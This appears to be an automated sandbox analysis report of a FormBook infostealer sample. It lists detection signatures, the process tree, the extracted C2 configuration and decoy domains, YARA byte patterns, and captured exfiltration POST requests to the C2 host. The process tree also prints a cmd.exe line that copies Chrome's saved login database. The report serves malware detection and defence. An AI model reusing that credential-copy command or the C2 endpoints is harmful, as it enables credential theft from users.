
# Windows Analysis Report WZ454554.exe

## Overview

### General Information

- Sample Name: WZ454554.exe
- Analysis ID: 552851
- MD5: 58b39c2620cdda3d3fa6a125f476fc9f
- SHA1: 5d2672c79e9dffb2cdeee0d00e406c03c762985c
- SHA256: fdf39d043cc55d6a72b1fe01c9067bb7591d5c379798499148521e6158afeea0
- Tags: exe, formbook

### Detection

- Score: 100
- Range: 0 - 100
- Whitelisted: false
- Confidence: 100%

### Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

### Classification

System is w10x64

Process tree (flat, in the order reported):

- WZ454554.exe (PID: 6628, cmdline: "C:\Users\user\Desktop\WZ454554.exe", MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
- WZ454554.exe (PID: 6936, cmdline: C:\Users\user\Desktop\WZ454554.exe, MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
- explorer.exe (PID: 3352, cmdline: C:\Windows\Explorer.EXE, MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- Hyrzbcwcas.exe (PID: 1840, cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe", MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
- Hyrzbcwcas.exe (PID: 5708, cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe, MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
- Hyrzbcwcas.exe (PID: 7108, cmdline: "C:\Users\user\Contacts\Hyrzbcwcas.exe", MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
- Hyrzbcwcas.exe (PID: 6340, cmdline: C:\Users\user\Contacts\Hyrzbcwcas.exe, MD5: 58B39C2620CDDA3D3FA6A125F476FC9F)
- help.exe (PID: 6656, cmdline: C:\Windows\SysWOW64\help.exe, MD5: 09A715036F14D3632AD03B52D1DA6BFF)
- cmd.exe (PID: 4324, cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- conhost.exe (PID: 5848, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5628, cmdline: C:\Windows\SysWOW64\cmd.exe, MD5: F3BDBE3BB6F734E357235F4D5898582D)
- help.exe (PID: 5832, cmdline: C:\Windows\SysWOW64\help.exe, MD5: 09A715036F14D3632AD03B52D1DA6BFF)
Extracted malware configuration (FormBook):

```json
{"C2 list": ["www.spiegelpherese.com/m9g2/"], "decoy": ["pubgnewstatedl.com", "guidedwaveradar.com", "onlineexitpoll.com", "mutationdesign.com", "p60p.com", "xhcaijing.com", "skpcart.store", "houseathomes.com", "thenorthdale.com", "kvkkkararozetleri.com", "formecondominium.com", "7808lll.com", "mitchfletcher.com", "thatsawrapfl.com", "glrinternationalfzco.com", "dbmxkgek.com", "feelingfancy.com", "nishieihuku.com", "newearthhg.com", "tenlog040.xyz", "savche.xyz", "solarofoundation.com", "sk8.network", "schooljoy.net", "ioannismitsialisgerman.online", "hooklinen.com", "gorgeousingems.com", "directusimmigration.com", "nexxt.info", "itecsecure.com", "chairsexpert.com", "yandex-check.online", "ivdripspace.com", "sentlogisticsja.com", "mdk-clothing.com", "quick2repair.net", "thisflippingfamily.com", "lu-dra.xyz", "degenape.art", "evodiocese2022scm.com", "churchofrocknroll.com", "visionaryblock.com", "jornalonlinealagoas.com", "rainbow-of-light.com", "oblical.com", "preserveliqueur.com", "morbidthings.com", "panoramaregency.com", "iphone13promax.review", "gongyingmi.com", "xqzs72.com", "sgmoda.com", "boogiereaper.com", "bitesofwellness.online", "backdad.com", "freeimperia.com", "senerants.tech", "029yu.xyz", "dhakhtar.net", "cnclighting.com", "iplmatchwinner.com", "thpt.space", "naris.net", "hamgirls.com"]}
```
Yara matches in dropped files:

Source: C:\Users\user\Contacts\sacwcbzryH.url
Rule: Methodology_Shortcut_HotKey
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
• 0x58:$hotkey: \x0AHotKey=3
• 0x0:$url_explicit: [InternetShortcut]

Source: C:\Users\user\Contacts\sacwcbzryH.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
• 0x14:$file: URL=
• 0x0:$url_explicit: [InternetShortcut]
Yara matches in memory dumps:

Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
• 0x16b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x11a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x17b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x192f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x41c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0x78f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x890a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
• 0x4819:$sqlite3step: 68 34 1C 7B E1
• 0x492c:$sqlite3step: 68 34 1C 7B E1
• 0x4848:$sqlite3text: 68 38 2A 90 C5
• 0x496d:$sqlite3text: 68 38 2A 90 C5
• 0x485b:$sqlite3blob: 68 53 D8 7F 8C
• 0x4983:$sqlite3blob: 68 53 D8 7F 8C
Yara matches in unpacked PEs:

Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
• 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
• 0x18819:$sqlite3step: 68 34 1C 7B E1
• 0x1892c:$sqlite3step: 68 34 1C 7B E1
• 0x18848:$sqlite3text: 68 38 2A 90 C5
• 0x1896d:$sqlite3text: 68 38 2A 90 C5
• 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
• 0x18983:$sqlite3blob: 68 53 D8 7F 8C

Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
• 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

## Sigma Overview

No Sigma rule has matched

## Jbx Signature Overview

### AV Detection:

Found malware configuration
- Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook (the configuration listed under Classification above)
Multi AV Scanner detection for submitted file
- Source: WZ454554.exe, Virustotal: Detection: 22%
- Source: WZ454554.exe, ReversingLabs: Detection: 39%
Yara detected FormBook
Multi AV Scanner detection for dropped file
- Source: C:\Users\user\Contacts\Hyrzbcwcas.exe, ReversingLabs: Detection: 39%
Antivirus or Machine Learning detection for unpacked file
- Source: 9.2.WZ454554.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
- Source: 9.1.WZ454554.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
- Source: WZ454554.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Uses secure TLS version for HTTPS connections
- Source: unknown, HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
- Source: unknown, HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
- Source: unknown, HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2
Binary contains paths to debug symbols
Found inlined nop instructions (likely shell or obfuscated code)
- Source: C:\Users\user\Desktop\WZ454554.exe, Code function: 4x nop then pop esi 9_2_004172E0
- Source: C:\Users\user\Desktop\WZ454554.exe, Code function: 4x nop then pop esi 9_2_004172F4
- Source: C:\Users\user\Desktop\WZ454554.exe, Code function: 4x nop then pop ebx 9_2_00407B1A
- Source: C:\Users\user\Desktop\WZ454554.exe, Code function: 4x nop then pop edi 9_2_00416CB1
- Source: C:\Users\user\Contacts\Hyrzbcwcas.exe, Code function: 4x nop then pop esi 17_2_004172E0
- Source: C:\Users\user\Contacts\Hyrzbcwcas.exe, Code function: 4x nop then pop esi 17_2_004172F4
- Source: C:\Users\user\Contacts\Hyrzbcwcas.exe, Code function: 4x nop then pop ebx 17_2_00407B1A
- Source: C:\Users\user\Contacts\Hyrzbcwcas.exe, Code function: 4x nop then pop edi 17_2_00416CB1

### Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
- Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
- Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
- Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49817 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
- Source: C:\Windows\explorer.exe, Domain query: www.sentlogisticsja.com
- Source: C:\Windows\explorer.exe, Domain query: www.senerants.tech
- Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
C2 URLs / IPs found in malware configuration
- Source: Malware configuration extractor, URLs: www.spiegelpherese.com/m9g2/
HTTP GET or POST without a user agent
- Source: global traffic, HTTP traffic detected:

```http
GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1
Host: www.sentlogisticsja.com
Connection: close
```

Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Uses a known web browser user agent for HTTP communication
- Source: global traffic, HTTP traffic detected (body shown as Data Ascii):

```http
POST /m9g2/ HTTP/1.1
Host: www.sentlogisticsja.com
Connection: close
Content-Length: 409
Cache-Control: no-cache
Origin: http://www.sentlogisticsja.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.sentlogisticsja.com/m9g2/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
```

- Source: global traffic, HTTP traffic detected (same headers as above with Content-Length: 149769; the 149769-byte form-encoded body is not reproduced here):

```http
POST /m9g2/ HTTP/1.1
Host: www.sentlogisticsja.com
Connection: close
Content-Length: 149769
Cache-Control: no-cache
Origin: http://www.sentlogisticsja.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.sentlogisticsja.com/m9g2/
Accept-Language: en-US
Accept-Encoding: gzip, deflate
```
Uses HTTPS
- Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49751
- Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49750
- Source: unknown, Network traffic detected: HTTP traffic on port 49746 -> 443
- Source: unknown, Network traffic detected: HTTP traffic on port 49747 -> 443
- Source: unknown, Network traffic detected: HTTP traffic on port 49751 -> 443
- Source: unknown, Network traffic detected: HTTP traffic on port 49750 -> 443
- Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49747
- Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49746
Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)
- Source: global traffic, HTTP traffic detected:

```http
HTTP/1.1 403 Forbidden
Server: openresty
Date: Thu, 13 Jan 2022 19:23:52 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6192576d-113"
Via: 1.1 google
Connection: close
```

Data Ascii (text of the 275-byte HTML body): Forbidden / Access Forbidden

URLs found in memory or binary data
- Source: WZ454554.exe, 00000002.00000003.285422442.0000000000878000.00000004.00000001.sdmp, WZ454554.exe, 00000002.00000003.285452298.0000000000878000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
- Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmp, String found in binary or memory: http://www.sentlogisticsja.com
- Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmp, String found in binary or memory: http://www.sentlogisticsja.com/m9g2/
Posts data to webserver
- Source: unknown, HTTP traffic detected: POST /m9g2/ HTTP/1.1 to Host: www.sentlogisticsja.com with Content-Length: 409; headers and form body are identical to the first request listed under "Uses a known web browser user agent for HTTP communication"
Performs DNS lookups
- Source: unknown, DNS traffic detected: queries for: cdn.discordapp.com